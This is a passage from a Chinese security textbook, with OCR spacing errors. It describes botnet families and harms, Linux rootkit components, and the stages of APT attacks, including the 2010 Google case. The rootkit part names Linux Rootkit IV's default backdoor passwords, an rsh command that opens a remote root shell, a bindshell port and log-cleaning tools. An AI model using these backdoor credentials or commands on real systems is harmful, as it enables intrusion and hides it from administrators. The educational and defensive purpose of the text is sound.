写 , 代 码 清晰 并 且 具 有 良好 的 抽象 设计 ,以 模块 化 的 方式 组 合 ,添加 命令 或 者 其 他 漏洞 的 扫 
描 器 及 攻击 功能 非常 简单 。 为 了 对 抗 逆向 工程 分 析 ,Agobot 设计 了 监测 调试 器 (Softice 和 
OllyDbg) 和 虚拟 机 (VMware 和 Virtualy PC) 的 功能 。 

(2) SDBot/RBot/UrBot/SpyBot。 这 个 家 族 是 目前 最 活跃 的 Bot 程序 。SDBot 由 C 语 
言 写成 , 它 提供 了 和 Agobot 一 样 的 功能 特征 ,但 是 命令 集 较 小 ,实现 也 没 那么 复杂 。 它 是 
基于 IRC 协议 的 一 类 Bot 程序 。 

(3) GT-Bots。GT-Bots 是 基于 IRC 客户 端 程序 mIRC 编写 的 。 这 类 僵尸 工具 用 脚本 
和 其 他 二 进 制 文件 开启 一 个 mIRC 聊天 客户 端 ,但 会 隐藏 原 mIRC 窗口 。 通 过 执行 mIRC 
脚本 连接 到 指定 的 服务 器 频道 上 ,等 待 恶意 命令 。 

2) 按 Botnet 的 控制 方式 分 类 

(1) IRC Botnet。 这 类 Botnet 利用 IRC 协议 进行 控制 和 通信 。 目 前 绝 大 多 数 Botnet 
都 属于 这 一 类 ,如 Spybot.GTbot 和 SDbot 等 。 

(2) AOL Botnet。 这 类 Botnet 是 依托 AOL 这 种 即时 通信 服务 形成 的 网 络 而 建立 的 ， 
被 感染 主机 登录 到 固定 的 服务 器 上 接收 控制 命令 。AIM-Canbot 和 Fizzer 就 采用 了 AOL 
Instant Messager 实现 对 Bot 的 控制 。 

(3) P2P Botnet。 这 类 Botnet 中 使 用 的 Bot 程序 本 身 包 含 了 P2P 的 客户 端 ,可 以 连 入 
采用 Gnutella 技术 (一 种 开放 源码 的 文件 共享 技术 ) 的 服务 器 ,利用 WASTE 文件 共享 协议 
进行 相互 通信 。 由 于 这 种 协议 分 布 式 地 进行 连接 .就 使 得 每 一 个 僵尸 主机 可 以 很 方便 地 找 
到 其 他 的 僵尸 主机 并 进行 通信 ,而 当 有 一 些 Bot 被 查 杀 时 ,并 不 会 影响 到 Botnet 的 生存 , 因 
此 这 类 Botnet 具有 不 存在 单 点 失效 但 实现 相对 复杂 的 特点 。Agobot 和 Phatbot 采用 了 
P2P 的 方式 。 

6. 僵尸 网 络 的 危害 

Botnet 构成 了 一 个 攻击 平台 ,利用 这 个 平台 可 以 有 效 地 发 起 各 种 各 样 的 攻击 行为 。 这 
种 攻击 可 以 导致 整个 基础 信息 网 络 或 者 重要 应 用 系统 瘫痪 ,也 可 以 导致 大 量 机 密 或 个 人 隐 
私 泄露 ,还 可 以 用 来 从 事 网 络 欺诈 等 其 他 违法 犯罪 活动 。 下 面 是 已 经 发 现 的 利用 Botnet 发 
动 的 攻击 行为 。 

(1) DDoS 攻击 。 使 用 Botnet 发 动 DDoS 攻击 是 当前 最 主要 的 威胁 之 一 。 攻 击 者 可 以 
向 自己 控制 的 所 有 僵尸 计算 机 发 送 指令 ,让 它们 在 特定 的 时 间 同 时 开始 连续 访问 特定 的 网 
络 目标 ,从 而 达到 DDoS 的 目的 。 由 于 Botnet 可 以 形成 庞大 规模 ,而 且 利 用 其 进行 DDoS 
攻击 可 以 做 到 更 好 地 同步 ,因此 在 发 布控 制 指令 时 ,能 够 使 得 DDoS 的 危害 更 大 ,防范 更 难 。 

(2) 发 送 垃 圾 邮件 。 一 些 Bots 会 设立 Sock v4、v5 代理 ,这 样 就 可 以 利用 Botnet 发 送 
大 量 的 垃圾 邮件 ,而 且 发 送 者 可 以 很 好 地 隐藏 自身 的 IP 信息 。 
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(3) 窃取 秘密 。Botnet 的 控制 者 可 以 从 僵尸 主机 中 窃取 用 户 的 各 种 敏感 信息 和 其 他 秘 
密 , 如 个 人 账号 .机 密 数 据 等 。 同 时 ,Bot 程序 能 够 使 用 Sniffer 观测 感 兴趣 的 网 络 数 据 ,从 
而 获得 网 络 流量 中 的 秘密 。 

(4) 滥用 资源 。 攻 击 者 利用 Botnet 从 事 各 种 需要 耗费 网 络 资源 的 活动 ,从 而 使 用 户 的 
网 络 性 能 受到 影响 ,甚至 带 来 经 济 损失 。 

可 以 看 出 ,Botnet 无 论 是 对 整个 网 络 还 是 对 用 户 自身 ,都 造成 了 比较 严重 的 危害 ,必须 
要 采取 有 效 的 方法 减少 Botnet 的 危害 。 


9.5 Rootkit 恶意 代码 


Rootkit 出 现 于 20 世纪 90 年 代 初 。1994 年 2 月 ,在 CERT/CC 发 布 的 一 篇 名 为 
Ongoing Network Monitoring Attacks(CA-1994-01) 的 安全 咨询 报告 中 ,Rootkit 这 个 名 词 
首先 被 使 用 。 从 出 现 至 今 ,Rootkit 的 技术 发 展 非常 迅速 ,应 用 越 来 越 广泛 ,检测 难度 也 越 来 
越 大 。 其 中 针对 SunOS 和 Linux 两 种 操作 系统 的 Rootkit 最 多 。 

1，Rootkit 的 定义 


Rootkit 是 攻击 者 用 来 隐藏 自己 踪迹 和 保留 root 访问 权限 的 工具 。 通 常 ,攻击 者 通过 
远程 攻击 获得 root 访问 权限 。 获 得 root 权限 前 ,攻击 者 需要 通过 密码 猜测 或 者 密码 强制 破 
译 的 方式 获得 系统 的 访问 权限 。 进 入 系统 后 ,如 果 还 没有 获得 root 权限 ,再 通过 某 些 安全 
漏洞 获得 系统 的 root 权限 。 接 着 ,攻击 者 会 在 侵入 的 主机 中 安装 Rootkit, 然 后 它 就 会 经 
通过 Rootkit 的 后 门 检查 系统 是 否 有 其 他 用 户 登 录 ,如 果 只 有 攻击 者 本 人 ,攻击 者 就 开始 着 
手 清理 日 志 中 的 有 关 信 息 。 另 外 ,攻击 者 可 以 通过 Rootkit 中 的 嗅 探 工 具 截 获 网 络 中 其 他 
系统 的 用 户 和 口令 ,并 且 可 以 利用 这 些 信息 侵入 其 他 的 系统 。 

2. Rootkit 的 内 容 

所 有 的 Rootkit 基本 上 都 是 由 几 个 独立 的 程序 组 成 的 。 一 个 典型 Rootkit 包括 如 下 一 
些 独立 的 程序 。 

(1) 网 络 嗅 探 程序 。 网 络 嗅 探 程序 用 于 获得 网 络 上 传输 的 用 户 名 和 密码 等 信息 。 典 型 
的 工具 包括 Sniffer Pro 等 。 

(2) 特洛伊 木马 程序 。 特 洛 伊 木马 程序 用 于 为 攻击 者 提供 后 门 。 典 型 的 木马 程序 包括 
inetd \login 等 。 

(3) 隐藏 攻击 者 的 目录 和 进程 的 程序 。 该 类 程序 是 为 了 隐藏 攻击 者 的 痕迹 的 ,如 隐藏 
攻击 者 在 目标 主机 上 创建 的 目录 ,以 及 在 目标 主机 上 启动 的 进程 。 典 型 的 工具 包括 ps、 
netstat\rshd ls 等 。 

(4) 日 志清 理工 具 。 攻 击 者 使 用 这 些 清 理工 具 删 除 wtmp、utmp 和 lastlog 等 日 志文 件 
中 有 关 自 己 行踪 的 条 目 。 典 型 的 日 志清 理工 具 包 括 zap、zap2 、z2 等 。 

(5) FIX 程序 。FIX 能 够 根据 原来 的 程序 伪造 蔡 代 程序 的 3 个 时 间 戳 (atime、ctime、 
mtime) 、date、permission、 所 属 用 户 和 所 属 用 户 组 。 在 安装 Rootkit 之 前 ,攻击 者 可 以 先 使 
用 这 个 程序 做 一 个 系统 二 进 制 代码 的 快照 ,然后 再 安装 替代 程序 。 
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(6) 其 他 工具 。 一 些 复杂 的 Rootkit 还 可 以 向 攻击 者 提供 telnet、Shell 和 finger 等 服务 。 
此 外 ,Rootkit 还 可 能 包括 一 些 用 来 清理 /var/log 和 /var/adm 目录 中 其 他 文件 的 一 些 脚本 。 

3. Rootkit 的 使 用 过 程 

在 熟悉 Rootkit 工具 后 ,攻击 者 就 可 能 用 这 些 工 具 攻 击 一 些 系统 ,典型 的 攻击 过 程 简单 
概述 如 下 。 

攻击 者 使 用 Rootkit 中 的 相关 程序 替代 系统 原来 的 ps\ls netstat ,df 等 程序 ,使 系统 管 
理 员 无 法 通过 这 些 工具 发 现 自己 的 踪迹 。 接 着 ,攻击 者 使 用 日 志清 理工 具 清 理 系统 日 志 , 销 
毁 自 己 的 踪迹 。 然 后 ,攻击 者 会 经 常 通过 安装 的 后 门 进入 系统 查看 嗅 探 器 的 日 志 , 以 发 起 对 
周围 其 他 系统 的 攻击 。 

如 果 攻 击 者 能 够 准确 地 使 用 这 些 应 用 程序 ,并 且 在 安装 Rootkit 时 行为 谨慎 ,就 会 让 系 
统管 理 员 很 难 发 现 系统 已 经 被 侵入 ,直到 某 一 天 其 他 系统 的 管理 员 和 他 联系 或 者 嗅 探 器 的 
日 志 把 磁盘 全 部 填 满 ,他 才 会 察觉 已 经 大 祸 临头 了 。 但 是 ,大 多 数 攻击 者 在 清理 系统 日 志 时 
不 是 非常 小 心 或 者 干脆 把 系统 日 志 全 部 删除 了 事 ,警觉 的 系统 管理 员 可 以 根据 这 些 异 常情 
况 判断 出 系统 已 被 侵入 。 不 过 ,在 系统 恢复 和 清理 过 程 中 ,大 多 数 常用 的 命令 如 ps、df 和 1s 
已 经 不 可 信 了 。 

4. Linux Rootkit IV 


大 部 分 Rootkit 是 针对 Linux 和 SunOS 两 类 操作 系统 的 , Windows 下 的 Rootkit 比较 
罕见 。Linux Rootkit IV 就 是 一 个 典型 的 针对 Linux 系统 的 、 开 放 源 码 的 Rootkit。 它 由 
Lord Somer 编写 ,并 于 1998 年 11 月 发 布 (Linux Rootkit IV 只 能 用 于 Linux 2. x 的 内 核 ) 。 
不 过 ,这 不 是 第 一 个 Linux Rootkit ,在 它 之 前 有 lrk、lnrk、lrk2 和 1rk3 等 Linux Rootkit。 这 
些 Rootkit 包括 常用 的 Rootkit 组 件 , 如 嗅 探 器 .日志 编 辑 / 删 除 工 具 和 后 门 程序 等 。 

经 过 这 么 多 年 的 发 展 ,Linux Rootkit IV 功能 变 得 越 来 越 完善 ,具有 的 特征 也 越 来 越 
多 。 尽 管 Linux Rootkit IV 的 代码 量 非常 庞大 , 却 非常 易于 安装 和 使 用 ,只 要 执行 make 
install 就 可 以 成 功 安装 。 如 果 还 要 安装 一 个 shadow 工具 ,只 要 执行 make shadow install 
就 可 以 了 。 下 面 简单 地 介绍 Linux Rootkit IV 包含 的 各 种 工具 ,详细 的 介绍 请 参考 其 发 布 
包 的 README 文件 。 

1) 隐藏 入 侵 者 行踪 的 程序 

为 了 隐藏 人 侵 者 的 行踪 ,Linux Rootkit IV 的 作者 可 谓 笋 费心 机 ,编写 了 许多 系统 命令 
的 蔡 代 程序 ,使 用 这 些 程序 代替 原 有 的 系统 命令 ,来 隐藏 人 侵 者 的 行踪 。 隐 藏 人 侵 者 行踪 的 
程序 又 可 以 分 为 如 下 几 组 。 

(1) ls,find、du。 这 些 程序 会 阻止 显示 入 侵 者 的 文件 及 计算 入 侵 者 文件 占用 的 空间 。 
在 编译 之 前 ,人 侵 者 可 以 通过 ROOTKIT_FILES_FILE 设置 自己 的 文件 所 处 的 位 置 ,默认 
是 /dev/ptyr。 注 意 ,如 果 在 编译 时 使 用 了 SHOWFLAG 选项 ,就 可 以 使 用 1s-/ 命 令 列 出 所 
有 的 文件 。 这 几 个 程序 还 能 够 自动 隐藏 所 有 名 称 为 ptyr、hack. dir 和 W4r3z 的 文件 。 

(2) ps、top、pidof。 这 几 个 程序 用 来 隐藏 所 有 与 入 侵 者 相关 的 进程 。 

(3) Netstat。 隐 藏 出 /人 指定 IP 地 址 或 者 端口 的 网 络 数据 流量 。 

(4) Killall: 不 会 终止 被 入 侵 者 隐藏 的 进程 。 

(5) Ifconfig。 如 果 入 侵 者 启动 了 嗅 探 器 ,这 个 程序 就 阻止 PROMISC 标记 的 显示 ,使 
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系统 管理 员 难 以 发 现 网 络 接 口 已 经 处 于 混杂 模式 下 。 

(6) Crontab。 隐 藏 有 关 攻 击 者 的 crontab 条 目 。 

(7) Tcpd。 阻 止 向 日 志 中 记录 某 些 连接 。 

(8) Syslogdo 过 滤 掉 日 志 中 的 某 些 连接 信息 。 

2) 权限 提升 程序 

权限 提升 程序 主要 为 攻击 者 提供 权限 提升 工具 。 这 类 程序 又 分 为 如 下 几 组。 

(1) Chfn。 提 升 本 地 普通 用 户 权限 的 程序 。 运 行 Chfn, 在 它 提示 输入 新 的 用 户 名 时 ， 
如 果 用 户 输入 Rookit 密码 ,他 的 权限 就 被 提升 为 root。 默 认 的 Rootkit 密码 是 satori。 

(2) Chsh。 也 是 一 个 提升 本 地 用 户 权限 的 程序 。 和 运行 Chsh, 在 它 提 示 输 入 新 的 Shell 
时 ,如 果 用 户 输入 Rootkit 密码 ,他 的 权限 就 被 提升 为 root。 

(3) Passwd。 与 上 面 两 个 程序 的 作用 相同 。 在 提示 用 户 输 入 新 密码 时 , 如果 输 入 
Rootkit 密码 ,权限 就 可 以 变 成 root。 

(4) Login。 人 允许 使 用 任何 账户 通过 Rootkit 密码 登录 。 如 果 使 用 root 账户 登录 被 拒 
绝 ,可 以 尝试 一 下 rewt。 当 使 用 后 门 时 ,这 个 程序 还 能 够 禁止 记录 命令 的 历史 记录 。 

3) 木马 网 络 监 控 程 序 

木马 网 络 监控 程序 为 远程 攻击 者 提供 后 门 ,可 以 向 远程 攻击 者 提供 inetd、rsh、ssh 等 服 
务 , 具 体 因 版 本 而 异 。 随 着 版 本 的 升级 ,Linux Rootkit IV 的 功能 也 越 来 越 强 大 ,特征 也 越 
来 越 丰富 。 一 般 包括 如 下 几 类 网 络 服务 程序 。 

(1) Inetd。 特 洛 伊 Inetd 程序 ,为 攻击 者 提供 远程 访问 服务 。 

(2) Rshd。 为 攻击 者 提供 远程 Shell 服务 。 攻 击 者 使 用 rsh-lrootkit password host 
command 命令 就 可 以 启动 一 个 远程 root shell。 

(3) Sshd。 为 攻击 者 提供 ssh 服务 的 后 门 程序 。 

4) 工具 程序 

所 有 不 属于 以 上 类 型 的 程序 都 可 以 归 和 这 个 类 型 ,它们 实现 一 些 如 日 志清 理 、 报 文 嗅 控 
及 远程 Shell 的 端口 绑 定 等 功能 。 这 类 程序 包括 如 下 几 种 。 

(1) Fix。 文 件 属性 伪造 程序 。 

(2) Linsniffer。 报 文 嗅 探 器 程序 。 

(3) Sniffchk。 一 个 简单 的 Bash shell 脚本 ,检查 系统 中 是 否 正 有 一 个 嗅 探 器 在 运行 。 

(4) Wted。wtmp/utmp 日 志 编辑 程序 。 可 以 使 用 这 个 工具 编辑 所 有 wtmp 类 型 或 者 
utmp 类 型 的 文件 。 

(5) z2。utmp/wtmp/lastlog 日 志清 理工 具 。 可 以 删除 utmp/wtmp/lastlog 日 志文 件 
中 有 关 某 个 用 户 名 的 所 有 条 目 。 不 过 ,如 果 用 于 Linux 系统 需要 手工 修改 其 源 代码 ,设置 日 
志文 件 的 位 置 。 

(6) Bindshell。 在 某 个 端口 上 绑 定 Shell 服务 ,默认 端口 是 12497 ,为 远程 攻击 者 提供 
Shell 服务 。 

S。Rootkit 的 防范 

很 显然 ,只 有 使 网 络 非常 安全 ,让 攻击 者 无 机 可 乘 ,才能 使 自己 的 网 络 免 受 Rootkit 的 
影响 。 不 过 , 慌 怕 没有 人 能 够 提供 这 个 保证 ,但 是 在 日 常 的 网 络 管理 维护 中 保持 一 些 良好 的 
习惯 ,能够 在 一 定 程度 上 避免 由 Rootkit 造成 的 损失 ,并 及 时 发 现 Rootkit 的 存在 。 要 防范 
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Rootkit ,必须 注意 以 下 几 点 。 

(1) 不 要 在 网 络 上 使 用 明文 传输 口令 ,或 者 使 用 一 次 性 口令 。 这 样 ,即使 用 户 的 系统 已 
经 被 装 入 了 Rootkit, 攻 击 者 也 无 法 通过 网 络 监听 来 获得 更 多 用 户 账号 和 口令 ,从 而 避免 入 
侵 的 蔓延 。 

(2) 使 用 Tripwire 和 AIDE 等 完整 性 检测 工具 能 够 及 时 地 帮助 用 户 发 现 攻击 者 的 人 
侵 。Tripwire 和 AIDE 等 工具 不 同 于 其 他 的 入 侵 检 测 工具 ,它们 不 是 通过 所 谓 的 攻击 特征 
码 来 检测 入 侵 行为 ,而 是 监视 和 检查 系统 发 生 的 变化 。Tripwire 首先 使 用 特定 的 特征 码 函 
数 为 需要 监视 的 系统 文件 和 目录 建立 一 个 特征 数据 库 。 所 谓 特征 码 函 数 ,就 是 使 用 任意 的 
文件 作为 输入 ,产生 一 个 固定 大 小 的 数据 (特征 码 ) 的 函数 ,通常 情况 下 这 个 特征 码 可 以 选择 
MD5 摘要 或 校 验 和 等 。 入 侵 者 如 果 对 文件 进行 了 修改 ,即使 文件 大 小 不 变 ,也 会 破坏 文件 
的 特征 码 。 利 用 这 个 数据 库 ,Tripwire 可 以 很 容易 地 发 现 系统 的 变化 。 文 件 的 特征 码 几 乎 
是 不 可 能 伪造 的 ,因此 ,系统 的 任何 变化 都 逃 不 过 Tripwire 的 监视 。 


9.6 高 级 持续 性 威胁 


高 级 持续 性 威胁 (Advanced Persistent Threat, APT) 是 利用 先进 的 攻击 手段 对 特定 日 
标 进行 长 期 持续 性 网 络 攻击 的 攻击 形式 。 

江海 客 ,水 波 等 信息 安全 工作 者 的 观点 是 "所谓 APT 攻击 并 非 是 真正 存在 的 ”。 因 为 
从 本 质 上 讲 ,APT 攻击 并 没有 任何 轩 新 的 攻击 手段 。APT 中 运用 的 攻击 手段 ,如 0 day 漏 
洞 钓 鱼 邮 件 、 社 会 工程 学 ,木马 和 DDoS 等 ,都 是 存在 已 久 的 攻击 手段 。APT 只 是 多 种 攻 
击 手段 的 综合 利用 而 已 。 因 此 ,在 业界 有 一 种 看 法 是 APT 应 该 是 国 与 国之 间 、 组 织 与 组 织 
之 间 网 络 战 的 一 种 具体 表现 形式 ,而 不 是 一 种 可 供 炒 作 的 黑客 人 侵 手段 。 


9.6.1 APT 的 攻击 过 程 


APT 攻击 集合 了 多 种 常见 攻击 方式 、 多 种 攻击 途径 来 尝试 突破 被 攻击 目标 的 网 络 防 
御 。 例 如 ,APT 也 会 像 普通 的 攻击 一 样 ,通过 Web 或 电子 邮件 传输 特点 信息 ,利用 应 用 程 
序 或 操作 系统 的 漏洞 利用 传统 的 网 络 保护 机 制 无 法 提供 统一 的 防御 等 技术 手段 。 除 了 使 
用 多 种 途径 ,APT 还 采用 多 个 阶段 渗透 一 个 网 络 , 然 后 提取 有 价值 的 信息 ,这 使 得 它 的 攻击 
更 不 容易 被 发 现 。 一 般 而 言 ,.APT 的 整个 攻击 生命 周期 可 以 分 为 5 个 阶段 。 

第 一 阶段 : 定向 搜 息 收 集 

在 定向 信息 收集 阶段 ,攻击 者 有 针对 性 地 搜集 特定 组 织 的 网 络 系统 和 员工 信息 。 信 息 
搜集 方法 很 多 ,包括 网 络 隐蔽 扫描 和 社会 工程 学 方法 等 。 从 目前 所 发 现 的 APT 攻击 手法 
来 看 ,大 都 是 从 组 织 员 工人 手 , 因 此 ,攻击 者 非常 注意 搜集 组 织 员工 的 信息 ,包括 员工 的 
社交 网 络 ( 微 信 、 微 博 、 博 客 、Facebook、Twitter 等 )、 邮 件 、 电 话 通 讯 录 等 ,以 便 了 解 他 们 的 
社会 关系 及 其 爱好 ,然后 通过 社会 工程 学 方法 来 攻击 该 员工 的 计算 机 ,从 而 进入 组 织 
网 络 。 

在 APT 攻击 中 ,攻击 者 会 花 几 个 月 甚至 更 长 的 时 间 对 “目标 ”网 络 进行 踩点 ,有 针对 性 地 进 
行 环境 探测 和 信息 搜集 ,包括 线 上 服务 器 分 布 情况 、 应 用 程序 的 弱点 、 业 务 状况 、 员 工 信 息 等 。 
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第 二 阶段 : 单 点 攻击 突破 

搜集 了 足够 的 信息 后 ,APT 攻击 者 会 采用 一 切 可 以 利用 的 手段 攻击 组 织 员工 的 个 人 计 
算 机 ,设法 实现 单 点 突破 。 在 多 数 情 况 下 ,攻击 者 会 向 目标 公司 的 员工 发 送 邮 件 , 诱 骗 其 打 
开 恶 意 附 件 , 或 者 单 击 一 个 经 过 伪造 的 恶意 URL, 希 望 利用 常见 软件 (如 Java 或 微软 的 办 
公 软 件 ) 的 0day 漏洞 , 投 送 其 恶意 代码 。 在 单 点 突破 阶段 的 攻击 方法 包括 以 下 几 种 。 

(1) 社会 工程 学 方法 。 社 会 工程 学 就 是 利用 人 的 薄弱 点 (心理 弱点 、 本 能 反应 、 好 奇 心 、 
信任 、 贪 焚 等 心理 陷阱 ) ,通过 欺骗 手段 而 入侵 计算 机 系统 的 一 种 攻击 方法 。 例 如 ,通过 电子 
邮件 给 攻击 目标 单位 的 员工 发 送 包 含 恶 意 代 码 的 文件 附件 , 当 员 工 打 开 附 件 时 ,员工 的 计算 
机 就 感染 了 恶意 代码 。 

(2) 远程 漏洞 攻击 方法 。 攻 击 者 通过 投 送 恶意 代码 ,并 利用 目标 企业 使 用 的 软件 中 的 
漏洞 执行 自身 。 例 如 ,在 员工 经 常 访问 的 网 站 上 放置 网 页 木马 , 当 员工 访问 该 网 站 时 ,就 遭 
受到 网 页 代码 的 攻击 。 

水 坑 攻 击 (Watering Hole) 就 是 利用 漏洞 攻击 的 典型 方法 。 水 坑 攻 击 是 指 黑客 通过 分 
析 被 攻击 者 的 网 络 活动 规律 ,寻找 被 攻击 者 经 常 访问 的 网 站 的 弱点 , 先 攻 下 该 网 站 并 植 入 攻 
击 代 码 ,等 待 被 攻击 者 来 访 时 实施 攻击 。 水 坑 攻击 属于 APT 攻击 的 一 种 ,与 钓鱼 攻击 相 
比 ,黑客 无 须 耗费 精力 制作 钓鱼 网 站 ,而 是 利用 合法 网 站 的 弱点 ,隐蔽 性 比较 强 。 在 安全 意 
识 不 断 加 强 的 今天 ,黑客 处 心 积 虑 地 制作 钓鱼 网 站 却 被 有 心 人 轻易 识破 ,而 水 坑 攻 击 则 利用 
了 被 攻击 者 对 网 站 的 信任 。 水 坑 攻 击 利用 网 站 的 弱点 在 其 中 植 入 攻击 代码 ,攻击 代码 利用 
浏览 器 的 缺陷 ,被 攻击 者 访问 网 站 时 终端 会 被 植 人 恶意 程序 或 者 直接 被 瓷 取 个 人 重要 信息 。 

如 果 漏 洞 利用 成 功 的话 ,被 攻击 的 系统 将 受到 感染 。 普 通用 户 系 统 忘记 打 补 丁 是 很 常 
见 的 ,所 以 他 们 很 容易 受到 已 知 和 未 知 的 漏洞 利用 攻击 。 

第 三 阶段 : 构建 通道 

攻击 者 控制 了 员工 个 人 计算 机 后 ,需要 在 攻击 者 和 攻击 目标 之 间 建 立 长 期 的 联系 通道 ， 
以 通过 该 通道 发 送 攻击 指令 ,传输 数据 等 。 这 个 通道 目前 多 采用 https 协议 构建 ,以 便 突破 
组 织 的 防火 墙 。 

最 常用 的 建立 通道 的 方式 是 采用 特洛伊 木马 类 的 远程 控制 工具 。 一 旦 木马 被 植 入 成 
功 , 攻 击 者 就 已 经 从 组 织 防御 内 部 建立 了 一 个 控制 点 。 攻 击 者 最 常安 装 的 就 是 远程 控制 工 
具 。 这 些 远程 控制 工具 是 以 反 向 连接 模式 建立 的 ,其 目的 就 是 允许 从 外 部 控制 员工 计算 机 
或 服务 器 , 即 这 些 工具 从 位 于 中 心 的 命令 和 控制 服务 器 接收 命令 ,然后 执行 命令 ,而 不 是 远 
程 得 到 命令 。 这 种 连接 方法 使 其 更 难以 检测 ,因为 员工 的 计算 机 是 主动 与 命令 和 控制 服务 
器 通信 而 不 是 相反 。 

第 四 阶段 : 横向 渗透 

一 般 来 说 ,攻击 者 首先 突破 的 员工 个 人 计算 机 并 不 是 攻击 者 感 兴趣 的 , 它 感 兴趣 的 是 组 
织 内 部 其 他 包含 重要 资产 的 服务 器 。 因 此 ,攻击 者 将 以 员工 个 人 计算 机 为 跳板 ,在 系统 内 部 
进行 横向 渗透 ,以 攻陷 更 多 个 人 计算 机 和 服务 器 。 攻 击 者 采取 的 横向 渗透 方法 包括 口令 窃 
听 和 漏洞 攻击 等 。 

第 五 阶段 : 目标 行动 

APT 攻击 者 的 最 终 目标 是 将 敏感 数据 从 被 攻击 的 网 络 非 法 传输 到 由 攻击 者 控制 的 外 
部 系统 ,也 就 是 获得 有 价值 的 数据 。 在 发 现 有 价值 的 数据 后 ,APT 攻击 者 往往 要 将 数据 收 
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集 到 一 个 文档 中 ,然后 压缩 并 加 密 该 文档 。 此 操作 可 以 使 其 隐藏 内 容 , 防 止 遭 受 深度 的 数据 
包 检 查 和 DLP 技术 的 检测 和 阻止 。 最 后 将 数据 从 受害 系统 偷 运 出 去 到 由 攻击 者 控制 的 外 
部 。 大 多 数 公司 都 没有 针对 这 些 恶 意 传输 和 目的 地 分 析出 站 流量 。 


9.6.2 APT 的 特征 


如 果 仅 从 攻击 步骤 来 看 ,APT 攻击 和 普通 的 攻击 行为 没什么 区 别 。 但 APT 之 所 以 称 
为 高 级 可 持续 威胁 , 那 必然 有 其 特有 的 特征 , 那 就 是 高 级 性 和 持续 性 。 

1. 高 级 性 

APT 攻击 的 方式 相对 于 其 他 攻击 形式 更 为 高 级 ,其 高 级 性 主要 体现 在 3 个 方面 。 

(1) 高 级 的 收集 手段 。APT 在 发 动 攻 击 之 前 需要 对 攻击 对 象 的 业务 流程 和 目标 系统 
进行 精确 的 收集 。 在 此 收集 的 过 程 中 ,此 攻击 会 主动 挖掘 被 攻击 对 象 受信 系统 和 应 用 程序 
的 漏洞 ,利用 这 些 漏 洞 组 建 攻击 者 所 需 的 网 络 ,并 利用 0day 漏洞 进行 攻击 。 

(2) 威胁 高 级 的 数据 。APT 是 黑客 以 窃取 核心 资料 为 目的 ,针对 客户 所 发 动 的 网 络 攻 
击 和 侵袭 行为 ,是 一 种 蓄 谋 已 久 的 “恶意 商业 间谍 威胁 ”。 这 种 行为 往往 经 过 长 期 的 经 营 与 
策划 ,并 具备 高 度 的 隐蔽 性 。 

(3) 高 级 的 攻击 手法 。APT 的 特征 之 一 在 于 隐匿 自己 ,针对 特定 对 象 长 期 有 计划 性 
和 组 织 性 地 窃取 数据 ,这 种 发 生 在 数字 空间 的 偷 穷 资料 ,搜集 情报 的 行为 ,就 是 一 种 “网 络 间 
谍 ” 的 行为 。 

2. 持续 性 

持续 性 是 APT 攻击 最 大 的 威胁 ,其 主要 特征 包括 以 下 几 点 。 

(1) 持续 潜伏 。 它 可 能 在 用 户 环 境 中 存在 一 年 以 上 或 更 久 , 在 此 期 间 不 断 搜 集 各 种 信 
息 ,直到 搜集 到 重要 情报 。 这 些 发 动 APT 攻击 的 黑客 目的 往往 不 是 为 了 在 短 时间 内 获 利 ， 
而 是 把 “被 控 主 机 ”当成 跳板 ,持续 搜索 ,直到 能 彻底 掌握 所 针对 的 目标 人 、 事 、 物 ,所 以 这 种 
APT 攻击 模式 具有 一 定 的 持续 性 。 

(2) 持续 攻击 。 由 于 APT 攻击 具有 持续 性 甚至 长 达 数 年 的 特征 ,这 让 企业 的 管理 人 员 
无 从 察觉 。 在 此 期 间 , 这 种 “持续 性 ”体现 在 攻击 者 不 断 尝试 的 各 种 攻击 手段 ,以 及 渗透 到 网 
络 内 部 后 长 期 热 伏 。 

(3) 持续 欺骗 。 针 对 特定 政府 或 企业 ,长 期 进行 有 计划 性 、 组 织 性 的 窃取 情报 行为 , 针 
对 被 锁定 对 象 寄 送 几 可 乱 真 的 社交 工程 恶意 邮件 ,如 冒充 客户 的 来 信 , 取 得 在 计算 机 植 人 恶 
意 软件 的 第 一 个 机 会 。 

(4) 持续 控制 。 攻 击 者 建立 一 个 类 似 僵尸 网 络 Botnet 的 远程 控制 架构 ,攻击 者 会 定期 
传送 有 潜在 价值 文件 的 副本 给 命令 和 控制 服务 器 (C&C Server) 审 查 。 将 过 滤 后 的 敏感 机 
密 数 据 利用 加 密 的 方式 外 传 。 


9.6.3 典型 的 APT 案例 


APT 攻击 者 的 目标 是 长 期 \ 有 计划 性 和 组 织 性 地 窃取 数据 。 这 种 攻击 往往 是 以 破坏 国 
家 或 大 型 企业 的 关键 基础 设施 为 目标 。 国 际 上 最 典型 的 案例 是 针对 Google 的 APT 攻击 事 
件 。2010 年 ,Google 的 一 名 雇员 点 击 即时 消息 中 的 一 条 恶意 链接 ,引发 了 一 系列 事件 导致 
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Google 的 网 络 被 渗透 数 月 ,并 造成 各 种 系统 数据 被 窃取 。 

此 次 APT 攻击 者 首先 寻找 特定 的 Google 员工 成 为 攻击 者 的 目标 。 攻 击 者 尽 可 能 地 收 
集 该 员工 在 Facebook、Twitter 和 其 他 社交 网 站 上 发 布 的 信息 。 然 后 攻击 者 利用 一 个 动态 
DNS 供应 商 来 建立 一 个 托管 伪造 照片 网 站 的 Web 服务 器 。 利 用 这 个 伪造 的 Web 服务 器 ， 
攻击 者 伪造 成 这 位 Google 员工 所 信任 的 人 ,并 向 他 发 送 了 恶意 链接 。 员 工 点 击 了 这 个 未 知 
的 网 络 链接 就 进入 了 恶意 网 站 。 该 恶意 网 站 页 面 含 有 Shellcode 的 JavaScript 脚本 造成 了 
IE 浏览 器 溢出 ,进而 执行 FTP 下 载 程序 。 攻 击 者 通过 SSL 安全 隧道 与 受害 人 机 器 建立 了 
链接 ,持续 监听 最 终 获 得 了 该 雇员 访问 Google 服务 器 的 账号 和 密码 等 信息 。 最 后 攻击 者 就 
使 用 该 雇员 的 凭证 成 功 渗透 进入 了 Google 的 邮件 服务 器 ,进而 不 断 地 获取 特定 Gmail 账户 
的 邮件 内 容 。 


9.6.4 APT 的 防范 


通过 前 面 的 介绍 可 知 ,APT 不 像 早 期 简单 的 黑客 攻击 ,因此 ,对 APT 的 防范 是 目前 信 
息 安 全 领域 的 难点 问题 。 近 年 来 ,威胁 情报 分 析 往 往 被 用 作 防 范 APT 的 方法 。 

目前 ,无 论 是 工业 界 还 是 学 术 界 对 威胁 情报 都 还 没有 一 个 统一 的 定义 ,许多 机 构 或 论文 
